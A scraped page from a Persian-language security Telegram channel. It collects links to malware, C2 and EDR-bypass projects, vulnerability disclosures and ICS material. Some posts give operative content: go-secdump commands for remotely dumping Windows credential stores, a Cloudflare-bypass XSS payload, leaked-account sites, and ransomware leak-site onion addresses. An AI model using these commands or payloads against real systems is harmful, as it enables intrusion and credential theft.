P.F.K Security
@PfkSecurity
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
About
Blog
Apps
Platform
Join
P.F.K Security
1.61K subscribers
P.F.K Security
Media is too big
VIEW IN TELEGRAM
Windows Malware using Github as C2 (Command and Control)

GithubC2

اثبات ساده کد مفهومی در سی شارپ برای ایجاد یک برنامه ساده ویندوزی که از مخزن Github و APIها به عنوان یک Command and Control channel (C2) استفاده می کند.

https://github.com/gemini-security/GithubC2

@PfkSecurity
486 views
P.F.K Security
Devil Hosting – Analysis CLR Hosting Used by Malwares


https://aleeamini.com/devil-hosting-clr-hosting-in-malwares/
#Malware
@PfkSecurity
Binary Graveyard 🪦
Devil Hosting - Analysis CLR Hosting Used by Malwares - Binary Graveyard 🪦 Devil Hosting
This type of malwares use the CLR Hosting, which I named it Devil Hosting, to run malicious codes in memory without any footprint.
432 views
P.F.K Security
آزمایشگاه دور زدن AV/EDR کوچک برای اهداف آموزشی و یادگیری

https://github.com/Xacone/BestEdrOfTheMarket#


تکنیک های دفاعی ⚔️

چند سطح API Hooking
SSN Hooking/Crushing
IAT Hooking
Shellcode Injection Detection

@pfksecurity
GitHub
GitHub - Xacone/BestEdrOfTheMarket: EDR Lab for Experimentation Purposes
EDR Lab for Experimentation Purposes. Contribute to Xacone/BestEdrOfTheMarket development by creating an account on GitHub.
466 views
P.F.K Security
NetGuard
راه های ساده و پیشرفته ای را برای مسدود کردن دسترسی به اینترنت ارائه می دهد - بدون نیاز به روت. برنامه‌ها و آدرس‌ها می‌توانند به‌صورت جداگانه اجازه داشته باشند یا از دسترسی به Wi-Fi و/یا اتصال تلفن همراه شما محروم شوند.
https://github.com/M66B/NetGuard
وب
https://netguard.me/
@pfksecurity
GitHub
GitHub - M66B/NetGuard: A simple way to block access to the internet per app
A simple way to block access to the internet per app - M66B/NetGuard
493 views
P.F.K Security
تشخیص Honeypots

الگوهای هسته برای تشخیص honeypot.
این مخزن شامل قالب‌های Nuclei برای شناسایی چندین هانی‌پات منبع باز معروف است، مانند: ADBHoney، Conpot، Cowrie، Dionaea (multiple services)، ElasticPot، Mailoney، Redis Honeypot، Snare و غیره.
https://github.com/UnaPibaGeek/honeypots-detection
#honeypot
@PfkSecurity
GitHub
GitHub - UnaPibaGeek/honeypots-detection: Nuclei templates for honeypots detection.
Nuclei templates for honeypots detection. Contribute to UnaPibaGeek/honeypots-detection development by creating an account on GitHub.
896 views
P.F.K Security
https://github.com/rivitna/Malware
GitHub
GitHub - rivitna/Malware
Contribute to rivitna/Malware development by creating an account on GitHub.
511 views
P.F.K Security
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei

Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176

Source: https://x.com/pdnuclei/status/1840195177098453308
@pfksecurity
evilsocket
Attacking UNIX Systems via CUPS, Part I
491 views
P.F.K Security
https://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
@pfksecurity
416 viewsedited  
P.F.K Security
🔄🖼️ go-secdump v0.3.0

ابزاری برای کپی از راه دور 🏠 اسرار ویندوز (SAM، LSA) بدون ذخیره در دیسک

پشتیبانی برای احراز هویت Kerberos اضافه شده است

username + password
username + NT Hash
username + AES Key
cached credentials on Linux (TGS or TGT in .ccache file)


مثال:

./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2

Relay:

./go-secdump --host 192.168.0.100 -n --relay

گزینه های اصلی:

--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>


▶️ https://github.com/jfjallid/go-secdump
▶️ https://github.com/jfjallid/go-secdump/releases

@PfkSecurity
409 views
P.F.K Security
چگونه ناشناس شویم

از یک سیستم عامل متمرکز بر حریم خصوصی مانند Tails استفاده کنید که تمام ترافیک اینترنت را از طریق شبکه Tor هدایت می کند.

از VPN یا TOR برای پنهان کردن آدرس IP و رمزگذاری ترافیک اینترنت خود استفاده کنید.

به جای نام واقعی خود از نام مستعار استفاده کنید.

از استفاده آنلاین از اطلاعات شخصی مانند آدرس منزل یا تاریخ تولد خودداری کنید.

از یک مرورگر وب امن مانند Tor، Brave، StartPage استفاده کنید که از ناشناس بودن شما محافظت می کند و webrtc را غیرفعال می کند.

از استفاده از آدرس ایمیل شخصی خود برای فعالیت های آنلاین خودداری کنید. از ایمیل جعلی برای فعالیت های ناشناس استفاده کنید

از اشتراک گذاری عکس ها یا داده های موقعیت مکانی در رسانه های اجتماعی خودداری کنید.

در صورت امکان از احراز هویت دو مرحله ای برای افزودن یک لایه امنیتی اضافی به حساب های آنلاین خود استفاده کنید.

برای جلوگیری از ردیابی، کوکی ها و تاریخچه مرور خود را به طور مرتب پاک کنید.

از استفاده از نام کاربری یکسان در چندین وب سایت خودداری کنید.

نیازهای خود را کنترل کنید زیرا نیازها و احساسات شما نسبت به دختر شما را آسیب پذیر می کند 💐 ❤️

از استفاده از شماره تلفن شخصی خود برای حساب های آنلاین خودداری کنید. آنها می توانند شما را به راحتی با این ردیابی کنند، در عوض، از یک شماره تلفن مجازی استفاده کنید.

از کلاهبرداری های فیشینگ و سایر تاکتیک ها مانند هانی پات که مهاجمان می توانند برای فریب شما برای افشای اطلاعات شخصی استفاده کنند آگاه باشید.

از یک سرویس به اشتراک گذاری فایل امن مانند SpiderOak استفاده کنید که فایل های شما را رمزگذاری می کند و ذخیره سازی ایمن را ارائه می دهد.

به غریزه خود اعتماد کنید و مراقب هر کسی که اطلاعات شخصی را می‌پرسد یا مشکوک به نظر می‌رسد باشید.


@PfkSecurity
543 views
P.F.K Security
هک کیا: کنترل از راه دور خودروها فقط با پلاک

https://samcurry.net/hacking-kia

@PfkSecurity
samcurry.net
Hacking Kia: Remotely Controlling Cars With Just a License Plate
On June 11th, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless…
965 views
P.F.K Security
Basic of PLC.pdf
2 MB
Basics of #PLC
@PfkSecurity
943 views
P.F.K Security
🔸️ موتورهای جستجوی DataBreach
🔹️برخی از بهترین موتورهای جستجوی نقض اطلاعات

Leak.sx - https://leak.sx/
∙ Intelligence X - https://intelx.io/
∙ leakcheck - https://leakcheck.io/
∙ weleakinfo - https://weleakinfo.to/
∙ leakpeek - https://leakpeek.com/
∙ snusbase - https://snusbase.com/
∙ leakedsource - https://wikileaks.org/
∙ leakedstuffs - https://piro.eu.org/
∙ WikiLeaks - https://cryptome.org/
∙ GlobaLeaks - https://lnkd.in/gJqT83f
∙ Firefox Monitor - https://lnkd.in/gW7EqXr
∙ haveibeenpwned? - https://haveibeenpwned.com/
∙ BreachAlarm - https://breachalarm.com/
∙ freetools - https://piro.eu.org/

@PfkSecurity
leak.sx
Leak.sx | Homepage | best source for hacking tools.
Leak.sx - The best leaked accounts website, Homepage, free combo tool, ai image generator, roblox free roblox accounts, free membership for netflix,Minecraft account generator.
678 views
P.F.K Security
Industrial Control Systems Cybersecurity.pdf
1.6 MB
Industrial Control Systems Cybersecurity
@PfkSecurity
573 views
P.F.K Security
CLOUDFLARE BYPASS

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


@PfkSecurity
547 views
P.F.K Security
از دوستان کسی اکانت vip tryhackme داره فقط برای 3 روز لازم دارم
اگر دارید ممنون میشم به اشتراک بگذارید :

@Aptmoqx0
664 views
P.F.K Security
امروز سالگرد تاج‌گذاری شاهنشاه داریوش بزرگ هخامنشی هست

خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.

@PfkSecurity
539 views
P.F.K Security
Media is too big
VIEW IN TELEGRAM
💡هک کیا: کنترل از راه دور خودروها فقط با پلاک

افشا:
https://samcurry.net/hacking-kia
@PfkSecurity
518 views
P.F.K Security
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion

@PfkSecurity
550 views
P.F.K Security
💡بعضی از شما پرسیده‌اید که URL برای دیدن آخرین نسخه‌های درام Evil Corp و LockBit چیست:

lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion

@PfkSecurity
564 views
P.F.K Security
This media is not supported in your browser
VIEW IN TELEGRAM
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
493 views